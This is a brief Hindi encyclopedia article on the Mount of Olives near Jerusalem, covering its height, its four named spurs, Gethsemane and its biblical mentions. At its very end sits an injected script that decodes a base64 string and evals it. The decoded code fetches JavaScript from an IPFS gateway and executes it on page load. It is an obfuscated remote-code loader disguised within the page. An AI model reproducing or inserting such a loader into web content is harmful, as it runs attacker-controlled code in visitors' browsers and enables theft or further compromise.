आलिव पहाड़ी
आलिव पहाड़ी जेरूसलम नगर के पूर्व में स्थित ऐतिहासिक पहाड़ी है और उस नगर से जेहोशफात की घाटी और किडरोन नदी द्वारा पृथक् है। इस पहाड़ी के शिखर की ऊँचाई समुद्रतल से 2737 फुट है। बाइबिल संबंधी अनेक घटनाओं का स्थल होने के कारण यह पहाड़ी महत्वपूर्ण है। इस पहाड़ी की चार शाखाएं हैं जिनके नाम उत्तर से दक्षिण की ओर क्रमानुसार गैलिली अथवा वारी गैलिली, असंशन की पहाड़ी, प्राफेट्स और आफेंस की पहाड़ी हैं।[1] इन चारों में सबसे अधिक महत्वपूर्ण असंशन की पहाड़ी है। इसके निचले भाग में गेथसीमेन का उद्यान स्थित था। इस पहाड़ी का उल्लेख बाइबिल के पुराने भाग (ओल्ड टेस्टामेंट) में चार स्थानों पर आया है।[2]
|
|
|
|
|
टीका टिप्पणी और संदर्भ
संबंधित लेख
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>